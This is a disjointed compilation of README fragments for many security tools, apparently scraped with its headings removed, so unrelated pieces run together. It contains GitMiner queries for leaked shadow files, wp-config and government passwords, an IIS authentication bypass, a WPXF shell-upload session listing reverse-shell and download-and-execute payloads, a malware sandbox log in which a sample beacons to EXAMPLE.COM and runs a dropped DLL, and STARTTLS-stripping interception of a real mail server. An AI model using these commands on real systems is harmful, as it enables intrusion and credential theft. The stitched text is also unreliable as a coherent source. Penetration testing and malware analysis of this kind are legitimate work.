1. Learn every possible fact about the couch, for example:
   
   • What is the server configuration?
   • What user accounts exist?
   • What user roles exist?
   • What databases exist?
   • In each database, what is the security setting?
   • In each design document, what are the validation functions?
2. Given the facts, compare them against each other and warn if they imply a security concern, for example:
   
   • You obviously didn't bother to click the "Security" link in the database page in Futon
   • Published CVE alerts apply to your version of CouchDB
   • A design document is missing a validate_doc_update function
   • Helpful summaries of how many admins, normal users, and anonymous users can access each database

npm install -g audit_couchdb

audit_couchdb https://admin:secret@localhost:5984

audit_couchdb --level=debug https://admin:secret@localhost:5984

• SEARCH engine
• XSS scanner.
• Sqlmap.
• LFI scanner.
• Filter wordpress and Joomla sites in the server.
• Find Admin page.
• Decode / Encode MD5 + Base64.
• Ports scan.
• Scan E-mails in sites.
• Use proxy.
• Random user agent.
• Fandom search engine.
• Scan errors.
• Detect Cms.
• Multiple instant scan.
• Disponible on BlackArch Linux Platform.

Difference between Appie and existing environments ?

• Tools contained in Appie are running on host machine instead of running on virtual machine.
• Less Space Needed(Only around 1.5GB required compared to atleast 10 GB of Virual Machine)
• As the name suggests it is completely Portable i.e it can be carried on USB Stick or on your own smartphone and your pentesting environment will go wherever you go without any configuring changes.
• Awesome Interface

Demo Video

• If you can guess the full extension (for instance .ASPX when the 8.3 extension is .ASP), always try the short name with the full extension.
• Sometimes short names are listed in Google which can be used to find the actual names
• Using text dictionary files is also recommended. If a name starts with another word, the second part should be guessed based on a dictionary file separately. For instance, ADDACC~1.ASP can be AddAccount.aspx, AddAccounts.aspx, AddAccurateMargine.aspx, etc
• Searching in the website contents and resources can also be useful to find the full name. This can be achieved for example by searching Site Map in the Burp Suite tool.

• iis_shortname_scanner.jar
• config.xml
• run.bat
• multi_targets.sh

- Example 0 (to see if the target is vulnerable):
 java -jar iis_shortname_scanner.jar http://example.com/folder/

- Example 1 (uses no thread - very slow):
 java -jar iis_shortname_scanner.jar 2 0 http://example.com/folder/new%20folder/

- Example 2 (uses 20 threads - recommended):
 java -jar iis_shortname_scanner.jar 2 20 http://example.com/folder/new%20folder/

- Example 3 (saves output in a text file):
 java -jar iis_shortname_scanner.jar 0 20 http://example.com/folder/new%20folder/ > c:\results.txt

- Example 4 (bypasses IIS basic authentication):
 java -jar iis_shortname_scanner.jar 2 20 http://example.com/folder/AuthNeeded:$I30:$Index_Allocation/

- Example 5 (using a new config file):
 java -jar iis_shortname_scanner.jar 2 20 http://example.com/folder/ newconfig.xml 

- Example 6 (scanning multiple targets using a linux box):
 ./multi_targets.sh scope.txt 1

http://target/folder/valid*~1.*/.aspx
http://target/folder/invalid*~1.*/.aspx

http://target/folder/valid*~1.*\.asp
http://target/folder/invalid*~1.*\.asp

Thank you for contacting the Microsoft Security Response Center.  

We appreciate your bringing this to our attention.  Our previous guidance stands: deploy IIS with 8.3 names disabled.  

    Key:   HKLM\SYSTEM\CurrentControlSet\Control\FileSystem
    Name:  NtfsDisable8dot3NameCreation 
    Value:        1 

• New Maltego Plugin

• Added support for Kali Rolling Edition
• Added support for Mint 17
• Added user notification when the current Workspace doesn't exist
• Added removeBySeverity.py script - as its name describes, it removes all vulns with a specific severity value. It supports the following parameters:
• -v extended output
• -t dry-run, won't connect to DB
• -s severity to filter by, required
• -d workspace, required
  

python $FARADAY/helpers/removeBySeverity.py -d WORKSPACE_NAME -s SEVERITY -v 

• Fixed bug in pip Debian
• Fixed pip install bug
• Checks additionals about dependencies in installation
• Warning about a upgrade to experimental in debian installation
• Fixed small bug in CSV importing
• Fixed styles for Status Report
• Fixed bug on Status Report filter after editing
• Show all evidence files in Status Report
• Fixed Arachni Plugin bugs

$ python SFTPfuzzer.py

$ python SFTPfuzzer.py -t <rhost> -p <rport>

$ python SFTPfuzzer.py -t 192.168.1.8 -p 21

argparse
requests
json
lxml

git clone http://github.com/danilovazb/GitMiner

sudo apt-get install python-requests python-lxml 
OR
pip install lxml requests

usage: 
██████╗ ██╗████████╗███╗   ███╗██╗███╗   ██╗███████╗██████╗ 
██╔════╝ ██║╚══██╔══╝████╗ ████║██║████╗  ██║██╔════╝██╔══██╗
██║  ███╗██║   ██║   ██╔████╔██║██║██╔██╗ ██║█████╗  ██████╔╝
██║   ██║██║   ██║   ██║╚██╔╝██║██║██║╚██╗██║██╔══╝  ██╔══██╗
╚██████╔╝██║   ██║   ██║ ╚═╝ ██║██║██║ ╚████║███████╗██║  ██║
╚═════╝ ╚═╝   ╚═╝   ╚═╝     ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ v1.1
 Automatic search for GitHub.                                                            

 + Autor: Danilo Vaz a.k.a. UNK
 + Blog: http://unk-br.blogspot.com
 + Github: http://github.com/danilovazb
 + Gr33tz: l33t0s, RTFM

 +[WARNING]------------------------------------------+
 | THIS TOOL IS THE PENALTY FOR EDUCATIONAL USE,     |
 | THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE TO   |
 | THE TOOL THAT USE.                                |
 +---------------------------------------------------+


       [-h] [-q 'filename:shadown path:etc']
       [-m wordpress] [-o result.txt]

optional arguments:
  -h, --help            show this help message and exit
  -q 'filename:shadown path:etc', --query 'filename:shadown path:etc'
                        Specify search term
  -m wordpress, --module wordpress
                        Specify the search module
  -o result.txt, --output result.txt
                        Specify the output file where it will be
                        saved

$:> python git_miner.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -o result.txt

$:> python git_miner.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas

$:> python git_miner.py --query 'filename:shadow path:etc' -m root

$:> python git_miner.py --query 'filename:configuration extension:php "public password" in:file' -m joomla

$ whatportis redis
+-------+------+----------+---------------------------------------+
| Name  | Port | Protocol | Description                           |
+-------+------+----------+---------------------------------------+
| redis | 6379 |   tcp    | An advanced key-value cache and store |
+-------+------+----------+---------------------------------------+

$ whatportis 5432
+------------+------+----------+---------------------+
| Name       | Port | Protocol | Description         |
+------------+------+----------+---------------------+
| postgresql | 5432 |   tcp    | PostgreSQL Database |
| postgresql | 5432 |   udp    | PostgreSQL Database |
+------------+------+----------+---------------------+

$ whatportis mysql --like
+----------------+-------+----------+-----------------------------------+
| Name           |  Port | Protocol | Description                       |
+----------------+-------+----------+-----------------------------------+
| mysql-cluster  |  1186 |   tcp    | MySQL Cluster Manager             |
| mysql-cluster  |  1186 |   udp    | MySQL Cluster Manager             |
| mysql-cm-agent |  1862 |   tcp    | MySQL Cluster Manager Agent       |
| mysql-cm-agent |  1862 |   udp    | MySQL Cluster Manager Agent       |
| mysql-im       |  2273 |   tcp    | MySQL Instance Manager            |
| mysql-im       |  2273 |   udp    | MySQL Instance Manager            |
| mysql          |  3306 |   tcp    | MySQL                             |
| mysql          |  3306 |   udp    | MySQL                             |
| mysql-proxy    |  6446 |   tcp    | MySQL Proxy                       |
| mysql-proxy    |  6446 |   udp    | MySQL Proxy                       |
| mysqlx         | 33060 |   tcp    | MySQL Database Extended Interface |
+----------------+-------+----------+-----------------------------------+

$ pip install whatportis

$ whatportis 5432 --json
[
    {
        "description": "PostgreSQL Database",
        "protocol": "tcp",
        "name": "postgresql",
        "port": "5432"
    },
    {
        "description": "PostgreSQL Database",
        "protocol": "udp",
        "name": "postgresql",
        "port": "5432"
    }
]

$ whatportis --server localhost 8080
 * Running on http://localhost:8080/ (Press CTRL+C to quit)

$ curl http://localhost:8080/ports
"ports": [
  {
    "description": "Description",
    "name": "Service Name",
    "port": "Port Number",
    "protocol": "Transport Protocol"
  },
  ...
]


$ curl http://localhost:8080/ports/3306
{
  "ports": [
    [
      "mysql",
      "3306",
      "tcp",
      "MySQL"
    ],
    [
      "mysql",
      "3306",
      "udp",
      "MySQL"
    ]
  ]
}

$ curl http://localhost:8080/ports/mysql?like
{
  "ports": [
    [
      "mysql-cluster",
      "1186",
      "tcp",
      "MySQL Cluster Manager"
    ],
    [
      "mysql-cluster",
      "1186",
      "udp",
      "MySQL Cluster Manager"
    ],
    ...
}

• "Why not use grep <port> /etc/services " ? Simply because I want a portable command that display the output in a nice format (a pretty table).
• The tool uses the Iana.org website to get the official list of ports. A private script has been created to fetch regularly the website and update the ports.json file. For this reason, an update command will be created in a future version.

wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

• bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
• custom: uploads and executes a custom PHP script.
• download_exec: downloads and runs a remote executable file.
• exec: runs a shell command on the remote server and returns the output to the WPXF session.
• reverse_tcp: uploads a script that will establish a reverse TCP shell.

npm install

npm install minimist xmlhttprequest entities

Be careful when working with a real malware. A malware, which is aware of this sandbox, may try to escape and harm your PC. It's recommended you run it either from an unpriviledged Linux account or from within virtualized Windows machine. Angler files in the malware folder are NOT disarmed.

bash@linux# node jailme.js -h
11 Jan 00:07:39 - Malware sandbox ver. 0.2
11 Jan 00:07:39 - ------------------------
11 Jan 00:07:39 - Usage: node jailme.js  [[-e file1] [-e file2] .. ] [-o ofile] [-s odir] [--down=y] [malware1 [malware2] .. ]
11 Jan 00:07:39 -       -e ifile ... js that simulates specific environment
11 Jan 00:07:39 -       -o ofile ... name of the file where sandbox shall be dumped at the end
11 Jan 00:07:39 -       -s odir  ... output directory for generated files (malware payload)
11 Jan 00:07:39 -       --down=y ... use http request to download malware components automatically
11 Jan 00:07:39 -       malware  ... js with the malware code
11 Jan 00:07:39 - If no arguments are specified the default values are taken from config.json

node jailme.js malware/example.js

node jailme.js

node jailme.js malware/example_browser.js

• _eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.
• _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
• _wscript_urls - all URLs that the malware intended to GET or POST.
• _wscript_objects - WScript or ActiveX objects created.

bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 -  => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 -  => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 -  => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json

document._addElementById(id, content);

node jailme.js malware/angler.js

node jailme.js malware/angler.js > angler_log.txt

• python >= 2.7
• python-crypto
• python-mako
• python-paramiko

• Androguard
• apktool
• Dex2Jar
• Frida

• 2.7.9
• 2.7.10
• 2.7.11

• 1.7
• 1.8

• adb
  

• brew install qt
  
• brew install cmake
  

• git clone https://github.com/PySide/pyside-setup.git
  
• cd pyside-setup
  
• python setup.py bdistwheel
  

• export DYLD_LIBRARY_PATH="/usr/local/lib/python2.7/site-packages/PySide"

(lobotomy) help

Documented commands (type help <topic>):
----------------------------------------
_load           components  edit     li      pause        run        show
_relative_load  d2j         frida    list    permissions  save
attacksurface   debuggable  hi       load    profiler     set
bowser          decompile   history  loader  py           shell
cmdenvironment  ed          l        logcat  r            shortcuts

Undocumented commands:
----------------------
EOF  eof  exit  help  q  quit

[~/Tools/mobile/android/lobotomy]> python web/run.py runserver -h 0.0.0.0

[~/Tools/mobile/android/lobotomy]> python lobotomy.py


                  :                   :                  :
                 t#,                 t#,                t#,
            i   ;##W.   .           ;##W.              ;##W.
           LE  :#L:WE   Ef.        :#L:WE  GEEEEEEEL  :#L:WE             ..       : f.     ;WE.
          L#E .KG  ,#D  E#Wi      .KG  ,#D ,;;L#K;;. .KG  ,#D           ,W,     .Et E#,   i#G
         G#W. EE    ;#f E#K#D:    EE    ;#f   t#E    EE    ;#f         t##,    ,W#t E#t  f#f
        D#K. f#.     t#iE#t,E#f. f#.     t#i  t#E   f#.     t#i       L###,   j###t E#t G#i
       E#K.  :#G     GK E#WEE##Wt:#G     GK   t#E   :#G     GK      .E#j##,  G#fE#t E#jEW,
     .E#E.    ;#L   LW. E##Ei;;;;.;#L   LW.   t#E    ;#L   LW.     ;WW; ##,:K#i E#t E##E.
    .K#E       t#f f#:  E#DWWt     t#f f#:    t#E     t#f f#:     j#E.  ##f#W,  E#t E#G
   .K#D         f#D#;   E#t f#K;    f#D#;     t#E      f#D#;    .D#L    ###K:   E#t E#t
  .W#G           G#t    E#Dfff##E,   G#t      t#E       G#t    :K#t     ##D.    E#t E#t
 :W##########Wt   t     jLLLLLLLLL;   t        fE        t     ...      #G      ..  EE.
 :,,,,,,,,,,,,,.                                :                       j           t


(lobotomy) loader /Users/benjaminwatson/Android-Web-Browsers/opera-mini/apk/com.opera.mini.native.apk
[2015-08-03 19:16:44.866870] Loading : /Users/benjaminwatson/Android-Web-Browsers/opera-mini/apk/com.opera.mini.native.apk
(lobotomy)

(lobotomy) permissions list
[2015-08-03 19:27:31.175369] Permission: android.permission.ACCESS_FINE_LOCATION
[2015-08-03 19:27:31.175409] Permission: android.permission.ACCESS_NETWORK_STATE
[2015-08-03 19:27:31.175421] Permission: android.permission.INTERNET
[2015-08-03 19:27:31.175430] Permission: android.permission.NFC
[2015-08-03 19:27:31.175438] Permission: android.permission.WRITE_EXTERNAL_STORAGE
[2015-08-03 19:27:31.175446] Permission: com.android.launcher.permission.INSTALL_SHORTCUT
[2015-08-03 19:27:31.175454] Permission: com.opera.GET_BRANDING
[2015-08-03 19:27:31.175461] Permission: com.opera.mini.native.permission.CRASHHANDLER
[2015-08-03 19:27:31.175469] Permission: com.android.browser.permission.READ_HISTORY_BOOKMARKS
[2015-08-03 19:27:31.175477] Permission: android.permission.SYSTEM_ALERT_WINDOW
[2015-08-03 19:27:31.175484] Permission: android.permission.WAKE_LOCK
[2015-08-03 19:27:31.175491] Permission: com.google.android.c2dm.permission.RECEIVE
[2015-08-03 19:27:31.175498] Permission: com.opera.mini.native.permission.C2D_MESSAGE
[2015-08-03 19:27:31.175505] Permission: android.permission.READ_CONTACTS
[2015-08-03 19:27:31.175571] Permission: android.permission.VIBRATE

(lobotomy) permissions map
[2015-08-03 19:28:07.078496] Found permission mapping : android.permission.ACCESS_FINE_LOCATION
[2015-08-03 19:28:07.078543] Searching for : android.telephony.TelephonyManager
[2015-08-03 19:28:12.686411] Searching for : android.location.LocationManager
1 Lbo/app/bs;-><init>(Landroid/content/Context; Landroid/location/LocationManager; Lbo/app/bb; Lcom/appboy/configuration/XmlAppConfigurationProvider;)V (0x120) ---> Landroid/location/LocationManager;->requestLocationUpdates(Ljava/lang/String; J F Landroid/app/PendingIntent;)V
1 Lpz;->a()V (0x20) ---> Landroid/location/LocationManager;->requestLocationUpdates(Ljava/lang/String; J F Landroid/location/LocationListener;)V
1 Lbo/app/bs;->c()Lbo/app/da; (0x2e) ---> Landroid/location/LocationManager;->getProviders(Landroid/location/Criteria; Z)Ljava/util/List;
1 Lbo/app/bs;->c()Lbo/app/da; (0x54) ---> Landroid/location/LocationManager;->getProviders(Landroid/location/Criteria; Z)Ljava/util/List;
1 Lpy;->a(Llb;)Landroid/location/Location; (0x50) ---> Landroid/location/LocationManager;->getProviders(Z)Ljava/util/List;
1 Lbo/app/bs;->c()Lbo/app/da; (0x2e) ---> Landroid/location/LocationManager;->getProviders(Landroid/location/Criteria; Z)Ljava/util/List;
1 Lbo/app/bs;->c()Lbo/app/da; (0x54) ---> Landroid/location/LocationManager;->getProviders(Landroid/location/Criteria; Z)Ljava/util/List;
1 Lkf;->detectlocation(Ljava/lang/String;)V (0x9e) --->

(lobotomy) attacksurface
[2015-08-03 19:29:02.272276] ---------
[2015-08-03 19:29:02.272317] Activites
[2015-08-03 19:29:02.272327] ---------
[2015-08-03 19:29:02.272472] com.opera.android.MiniActivity : Found Activity with launchMode!
[2015-08-03 19:29:02.272507] com.opera.android.MiniActivity : launchMode : singleTask
[2015-08-03 19:29:02.272778] com.opera.mini.android.Browser : Found Activity with launchMode!
[2015-08-03 19:29:02.272793] com.opera.mini.android.Browser : launchMode : singleTask
[2015-08-03 19:29:02.272900] com.opera.mini.android.Browser : Found Activity with schemes!
[2015-08-03 19:29:02.272912] com.opera.mini.android.Browser : scheme : ftp
[2015-08-03 19:29:02.272932] com.opera.mini.android.Browser : scheme : about
[2015-08-03 19:29:02.272943] com.opera.mini.android.Browser : scheme : http
[2015-08-03 19:29:02.272952] com.opera.mini.android.Browser : scheme : opera
[2015-08-03 19:29:02.272961] com.opera.mini.android.Browser : scheme : adx
[2015-08-03 19:29:02.272970] com.opera.mini.android.Browser : scheme : https
[2015-08-03 19:29:02.273250] com.opera.mini.android.Browser : action : android.intent.action.MAIN
[2015-08-03 19:29:02.273263] com.opera.mini.android.Browser : action : android.intent.action.VIEW
[2015-08-03 19:29:02.273272] com.opera.mini.android.Browser : action : android.nfc.action.NDEF_DISCOVERED
[2015-08-03 19:29:02.273280] com.opera.mini.android.Browser : action : android.speech.action.VOICE_SEARCH_RESULTS
[2015-08-03 19:29:02.273289] com.opera.mini.android.Browser : action : android.intent.action.WEB_SEARCH
[2015-08-03 19:29:02.273297] com.opera.mini.android.Browser : category : android.intent.category.LAUNCHER
[2015-08-03 19:29:02.273305] com.opera.mini.android.Browser : category : android.intent.category.DEFAULT
[2015-08-03 19:29:02.273313] com.opera.mini.android.Browser : category : android.intent.category.BROWSABLE
[2015-08-03 19:29:02.273321] ---------
[2015-08-03 19:29:02.273328] Receivers
[2015-08-03 19:29:02.273335] ---------
[2015-08-03 19:29:02.273712] com.AdX.tag.AdXAppTracker : Found exported receiver!
[2015-08-03 19:29:02.273724] com.AdX.tag.AdXAppTracker : exported : true
[2015-08-03 19:29:02.273880] com.AdX.tag.AdXAppTracker : action : com.android.vending.INSTALL_REFERRER
[2015-08-03 19:29:02.274348] com.opera.android.gcm.GcmBroadcastReceiver : action : com.google.android.c2dm.intent.RECEIVE
[2015-08-03 19:29:02.274361] com.opera.android.gcm.GcmBroadcastReceiver : category : com.opera.mini.native
[2015-08-03 19:29:02.274821] com.opera.android.appboy.AppboyBroadcastReceiver : action : com.opera.mini.native.intent.APPBOY_PUSH_RECEIVED
[2015-08-03 19:29:02.274833] com.opera.android.appboy.AppboyBroadcastReceiver : action : com.opera.mini.native.intent.APPBOY_NOTIFICATION_OPENED
[2015-08-03 19:29:02.274842] ---------
[2015-08-03 19:29:02.274848] Providers
[2015-08-03 19:29:02.274855] ---------
[2015-08-03 19:29:02.275486] ---------
[2015-08-03 19:29:02.275494] Services
[2015-08-03 19:29:02.275511] ---------

• Pool Overflow
• Use After Free
• Type Confusion
• Stack Overflow
• Integer Overflow
• Stack Overflow GS
• Arbitrary Overwrite
• Null Pointer Dereference

1. Install Windows Driver Kit
2. Change %localSymbolServerPath% in Build_HEVD_Secure.bat and Build_HEVD_Vulnerable.bat driver builder
3. Run the appropriate driver builder Build_HEVD_Secure.bat or Build_HEVD_Vulnerable.bat

• Windows Kernel Exploitation 1
• Windows Kernel Exploitation 2
• Windows Kernel Exploitation 3
• Windows Kernel Exploitation 4
• Windows Kernel Exploitation 5

• Windows Kernel Exploitation Humla Pune
• Windows Kernel Exploitation Humla Mumbai

1. Test the Driver on Windows 8.1/10 x64
2. Add the exploit support for Windows 8.1/10 x64
3. Add Use Of Uninitialized Variable Vulnerability
4. Add Memory Disclosure Vulnerability
5. Add Time-Of-Check-To-Time-Of-Use ( TOCTTU/Race Condition ) Vulnerability
6. Refactor and Cleanup the driver and exploit source code

• SMBRelayX.py
• Veil (latest version from git)
• Responder (Chuckle will detect which version you are using.)
• Nmap
• Nbtscan (unixwiz)
• MSFconsole

sudo ./chuckle.sh

Goal

Features

What it's not?

Katnip

What's Next?

• Install Kitty:
  

  pip install git+https://github.com/cisco-sas/kitty.git#egg=kitty

• Read some of the documentation at ReadTheDocs .
  
• Build your fuzzer :-)
  
• Need some help - ask at our google group: kitty-fuzzer@googlegroups.com 

• SMTP
  • SMTP.StripFromCapabilities - server response capability patch
  • SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code
  • SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
  • SMTP.StripWithTemporaryError
  • SMTP.StripWithError
  • SMTP.ProtocolDowngradeStripExtendedMode
  • SMTP.InjectCommand
• POP3
  • POP3.StripFromCapabilities
  • POP3.StripWithError
  • POP3.UntrustedIntercept
• IMAP
  • IMAP.StripFromCapabilities
  • IMAP.StripWithError
  • IMAP.UntrustedIntercept
  • IMAP.ProtocolDowngradeToV2
• FTP
  • FTP.StripFromCapabilities
  • FTP.StripWithError
  • FTP.UntrustedIntercept
• NNTP
  • NNTP.StripFromCapabilities
    
  • NNTP.StripWithError
  • NNTP.UntrustedIntercept
• XMPP
  • XMPP.StripFromCapabilities
  • XMPP.StripInboundTLS
  • XMPP.UntrustedIntercept
• ACAP (untested)
  • ACAP.StripFromCapabilities
  • ACAP.StripWithError
  • ACAP.UntrustedIntercept
• IRC
  • IRC.StripFromCapabilities
  • IRC.StripWithError
  • IRC.UntrustedIntercept
  • IRC.StripWithNotRegistered
  • IRC.StripCAPWithNotregistered
  • IRC.StripWithSilentDrop

- [*] client: 127.0.0.1
-     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
-     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
-     [           ] <class striptls.StripFromCapabilities at 0xffd316bc>
-     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
- [*] client: 192.168.139.1
-     [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>
-     [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>
-     [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>

#> python -m striptls --help    # from pip/setup.py
#> python striptls --help       # from source / root folder
Usage: striptls [options]

       example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25


    Options:
      -h, --help            show this help message and exit
      -v, --verbose         make lots of noise [default]
      -l LISTEN, --listen=LISTEN
                            listen ip:port [default: 0.0.0.0:<remote_port>]
      -r REMOTE, --remote=REMOTE
                            remote target ip:port to forward sessions to
      -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM
                            format assumed [default: server.pem]
      -x VECTORS, --vectors=VECTORS
                            Comma separated list of vectors. Use 'ALL' (default)
                            to select all vectors. Available vectors:
                            ACAP.StripFromCapabilities, ACAP.StripWithError,
                            ACAP.UntrustedIntercept, FTP.StripFromCapabilities,
                            FTP.StripWithError, FTP.UntrustedIntercept,
                            IMAP.StripFromCapabilities, IMAP.StripWithError,
                            IMAP.UntrustedIntercept,
                            IRC.StripCAPWithNotRegistered,
                            IRC.StripFromCapabilities, IRC.StripWithError,
                            IRC.StripWithNotRegistered, IRC.StripWithSilentDrop,
                            IRC.UntrustedIntercept, NNTP.StripFromCapabilities,
                            NNTP.StripWithError, NNTP.UntrustedIntercept,
                            POP3.StripFromCapabilities, POP3.StripWithError,
                            POP3.UntrustedIntercept, SMTP.InjectCommand,
                            SMTP.ProtocolDowngradeStripExtendedMode,
                            SMTP.ProtocolDowngradeToV2,
                            SMTP.StripFromCapabilities, SMTP.StripWithError,
                            SMTP.StripWithInvalidResponseCode,
                            SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                            XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                            XMPP.UntrustedIntercept [default: ALL]

#> pip install striptls

#> setup.py install

                  inbound                    outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
  smtp-client                   striptls                    remote/target

#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO     - <Proxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.StripFromCapabilities at 0xffd4632c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.StripWithError at 0xffd4635c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.UntrustedIntercept at 0xffd4638c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.StripWithError at 0xffd4629c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.StripWithError at 0xffd4641c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): <class striptls.StripWithError at 0xffd461dc>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): <class striptls.UntrustedIntercept at 0xffd4620c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithError at 0xffd4614c>
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto:    XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>
2016-02-02 22:11:56,276 - INFO     - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>
2016-02-02 22:12:08,477 - DEBUG    - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO     - <Session 0xffcf6e4cL> client ('127.0.0.1', 28902) has connected
